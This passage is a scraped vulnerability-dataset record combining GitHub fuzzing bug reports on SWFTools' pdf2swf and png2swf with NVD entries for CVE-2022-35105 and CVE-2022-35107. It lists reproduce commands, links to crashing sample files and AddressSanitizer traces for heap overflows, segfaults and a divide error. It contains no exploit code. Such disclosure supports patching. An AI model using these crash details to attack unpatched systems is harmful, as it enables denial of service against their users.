Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #8 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #9 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #10 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #11 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #12 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #13 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #14 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #15 0x7f36eef4ac86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #16 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/pdf/xpdf/FoFiTrueType.cc:1776:14 in FoFiTrueType::computeTableChecksum(unsigned char*, int) ==64656==ABORTING ``` -------------------------- ## FPE ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id92_FPE.zip](https://github.com/matthiaskramm/swftools/files/9034371/id92_FPE.zip) ### crash info ``` ==42346==ERROR: AddressSanitizer: FPE on unknown address 0x000000634097 (pc 0x000000634097 bp 0x7fffc9768180 sp 0x7fffc9767b00 T0) #0 0x634097 in DCTStream::readMCURow() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2123:24 #1 0x632e98 in DCTStream::getChar() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2040:12 #2 0x60e023 in ImageStream::getLine() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:373:25 #3 0x60dd51 in ImageStream::getPixel(unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:344:5 #4 0x7c9dc5 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1303:12 #5 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #6 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #7 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #8 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #9 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #10 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #11 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #12 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #13 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #14 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #15 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #16 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #17 0x7f4bc52f2c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #18 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: FPE /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2123:24 in DCTStream::readMCURow() ==42346==ABORTING ``` --------------------------------- ## out of memory ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id298_out_of_memory.zip](https://github.com/matthiaskramm/swftools/files/9034503/id298_out_of_memory.zip) ### crash info ```shell ==102601==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x2e03f3250 bytes #0 0x4b3160 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x92c94f in draw_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:192:26 ==102601==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc ==102601==ABORTING ```
bug found in swftools-pdf2swf
https://api.github.com/repos/swftools/swftools/issues/182/comments
0
2022-07-03T08:46:34Z
2022-07-04T03:25:22Z
https://github.com/swftools/swftools/issues/182
1,292,246,190
182
CVE-2022-35105
2022-08-16T21:15:11.107
SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via /bin/png2swf+0x552cea.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:-:*:*:*:*:*:*:*", "matchCriteriaId": "05E27E60-6223-457B-BF90-E747C9C5DEE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/183
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
Hi, I currently learn to use fuzz tech to detect bugs and I found something in this repo. in order to reproduce the crash info, please attach ASAN when you compile this repo. ## heap buffer overflow ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id0_heap-buffer-overflow.zip](https://github.com/matthiaskramm/swftools/files/9034381/id0_heap-buffer-overflow.zip) ### crash info ``` ==109951==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000001c at pc 0x0000004f680f bp 0x7ffde7515f90 sp 0x7ffde7515f88 READ of size 1 at 0x60200000001c thread T0 #0 0x4f680e in png_read_header /home/bupt/Desktop/swftools/src/png2swf.c:184:10 #1 0x4fbbf8 in CheckInputFile /home/bupt/Desktop/swftools/src/png2swf.c:583:9 #2 0x4fca4e in args_callback_command /home/bupt/Desktop/swftools/src/png2swf.c:754:9 #3 0x4fcfd4 in processargs /home/bupt/Desktop/swftools/src/./../lib/args.h:89:16 #4 0x4fcfd4 in main /home/bupt/Desktop/swftools/src/png2swf.c:802:5 #5 0x7fc97197cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) 0x60200000001c is located 0 bytes to the right of 12-byte region [0x602000000010,0x60200000001c) allocated by thread T0 here: #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x4f579b in png_read_chunk /home/bupt/Desktop/swftools/src/png2swf.c:127:18 #2 0x4f5cc6 in png_read_header /home/bupt/Desktop/swftools/src/png2swf.c:170:11 #3 0x4fbbf8 in CheckInputFile /home/bupt/Desktop/swftools/src/png2swf.c:583:9 #4 0x4fca4e in args_callback_command /home/bupt/Desktop/swftools/src/png2swf.c:754:9 #5 0x4fcfd4 in processargs /home/bupt/Desktop/swftools/src/./../lib/args.h:89:16 #6 0x4fcfd4 in main /home/bupt/Desktop/swftools/src/png2swf.c:802:5 #7 0x7fc97197cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/src/png2swf.c:184:10 in png_read_header Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa 00[04]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==109951==ABORTING ``` ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id5_heap-buffer-overflow.zip](https://github.com/matthiaskramm/swftools/files/9034382/id5_heap-buffer-overflow.zip) ### crash info ``` ==7560==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000004a1 at pc 0x000000552b5b bp 0x7ffc4a0c7730 sp 0x7ffc4a0c7728 READ of size 1 at 0x6190000004a1 thread T0 #0 0x552b5a in png_load /home/bupt/Desktop/swftools/lib/png.c:813:15 #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #3 0x7fbc1782dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) 0x6190000004a1 is located 0 bytes to the right of 1057-byte region [0x619000000080,0x6190000004a1) allocated by thread T0 here: #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x54bf0e in png_load /home/bupt/Desktop/swftools/lib/png.c:517:33 #2 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #3 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #4 0x7fbc1782dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/png.c:813:15 in png_load Shadow bytes around the buggy address: 0x0c327fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8090: 00 00 00 00[01]fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==7560==ABORTING ``` ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id8_heap_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034383/id8_heap_buffer_overflow.zip) ### crash info ``` ==16841==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000001b4 at pc 0x000000552ceb bp 0x7fff18453570 sp 0x7fff18453568 READ of size 4 at 0x6020000001b4 thread T0 #0 0x552cea in png_load /home/bupt/Desktop/swftools/lib/png.c:832:43 #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #3 0x7f90177d9c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) 0x6020000001b4 is located 0 bytes to the right of 4-byte region [0x6020000001b0,0x6020000001b4) allocated by thread T0 here: #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x55014c in png_load /home/bupt/Desktop/swftools/lib/png.c:768:19 #2 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #3 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #4 0x7f90177d9c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/png.c:832:43 in png_load Shadow bytes around the buggy address: 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 00 05 0x0c047fff8010: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 00 05 0x0c047fff8020: fa fa fd fd fa fa 03 fa fa fa fd fd fa fa fd fd =>0x0c047fff8030: fa fa 00 05 fa fa[04]fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==16841==ABORTING ``` ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id13_heap-buffer-overflow.zip](https://github.com/matthiaskramm/swftools/files/9034384/id13_heap-buffer-overflow.zip) ### crash info ``` ==39505==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x617000000378 at pc 0x000000552c2e bp 0x7fff87bf0950 sp 0x7fff87bf0948 READ of size 4 at 0x617000000378 thread T0 #0 0x552c2d in png_load /home/bupt/Desktop/swftools/lib/png.c:832:43 #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #3 0x7f3352dcec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) 0x617000000378 is located 68 bytes to the right of 692-byte region [0x617000000080,0x617000000334) allocated by thread T0 here: #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x55014c in png_load /home/bupt/Desktop/swftools/lib/png.c:768:19 #2 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #3 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #4 0x7f3352dcec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/png.c:832:43 in png_load Shadow bytes around the buggy address: 0x0c2e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2e7fff8060: 00 00 00 00 00 00 04 fa fa fa fa fa fa fa fa[fa] 0x0c2e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==39505==ABORTING ``` ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id16_heap-buffer-overflow.zip](https://github.com/matthiaskramm/swftools/files/9034798/id16_heap-buffer-overflow.zip) ### crash info ``` ==29029==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000001b8 at pc 0x000000552ceb bp 0x7ffc959816f0 sp 0x7ffc959816e8 READ of size 4 at 0x6020000001b8 thread T0 ==29029==WARNING: failed to fork (errno 12) ==29029==WARNING: failed to fork (errno 12) ==29029==WARNING: failed to fork (errno 12) ==29029==WARNING: failed to fork (errno 12) ==29029==WARNING: failed to fork (errno 12) ==29029==WARNING: Failed to use and restart external symbolizer! #0 0x552cea (/home/bupt/Desktop/swftools/build/bin/png2swf+0x552cea) #1 0x4fac8f (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fac8f) #2 0x4fd5f5 (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fd5f5) #3 0x7f324745ac86 (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #4 0x41ce29 (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) 0x6020000001b8 is located 4 bytes to the right of 4-byte region [0x6020000001b0,0x6020000001b4) allocated by thread T0 here: #0 0x4af3f0 (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4af3f0) #1 0x55014c (/home/bupt/Desktop/swftools/build/bin/png2swf+0x55014c) #2 0x4fac8f (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fac8f) #3 0x4fd5f5 (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fd5f5) #4 0x7f324745ac86 (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/bupt/Desktop/swftools/build/bin/png2swf+0x552cea) Shadow bytes around the buggy address: 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd 0x0c047fff8010: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd 0x0c047fff8020: fa fa fd fd fa fa 03 fa fa fa fd fd fa fa fd fd =>0x0c047fff8030: fa fa fd fd fa fa 04[fa]fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ``` ---------------------- ## SEGV ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id12_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034385/id12_SEGV.zip) ### crash info ``` AddressSanitizer:DEADLYSIGNAL ==30779==ERROR: AddressSanitizer: SEGV on unknown address 0x7f62129fc800 (pc 0x000000550c36 bp 0x7ffc5ce7ea10 sp 0x7ffc5ce7e780 T0) ==30779==The signal is caused by a READ memory access. #0 0x550c36 in png_load /home/bupt/Desktop/swftools/lib/png.c:801:17 #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #3 0x7f6316332c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/png.c:801:17 in png_load ==30779==ABORTING ```
bug found in swftools-png2swf
https://api.github.com/repos/swftools/swftools/issues/183/comments
0
2022-07-03T08:51:23Z
2022-07-04T03:22:44Z
https://github.com/swftools/swftools/issues/183
1,292,247,150
183
CVE-2022-35107
2022-08-16T21:15:11.180
SWFTools commit 772e55a2 was discovered to contain a stack overflow via vfprintf at /stdio-common/vfprintf.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/184" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:-:*:*:*:*:*:*:*", "matchCriteriaId": "05E27E60-6223-457B-BF90-E747C9C5DEE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/184
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# heap buffer overflow ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id458_heap_overflow_draw_stroke.zip](https://github.com/matthiaskramm/swftools/files/9036118/id458_heap_overflow_draw_stroke.zip) ### crash info ``` ==11942==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x607000000690 at pc 0x00000092ce96 bp 0x7fff21d34940 sp 0x7fff21d34938 WRITE of size 8 at 0x607000000690 thread T0 #0 0x92ce95 in draw_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:207:17 #1 0x92e224 in gfxpoly_from_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:226:5 #2 0x90989c in polyops_stroke /home/bupt/Desktop/swftools/lib/devices/polyops.c:229:23 #3 0x7c1563 in VectorGraphicOutputDev::strokeGfxline(GfxState*, _gfxline*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:612:9 #4 0x7cd69e in VectorGraphicOutputDev::stroke(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1487:5 #5 0x6eeffa in Gfx::opStroke(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:1415:12 #6 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #7 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #8 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #9 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #10 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #11 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #12 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #13 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #14 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #15 0x7f395ddd6c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #16 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) 0x607000000690 is located 0 bytes to the right of 80-byte region [0x607000000640,0x607000000690) allocated by thread T0 here: #0 0x4b3160 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x92c94f in draw_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:192:26 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:207:17 in 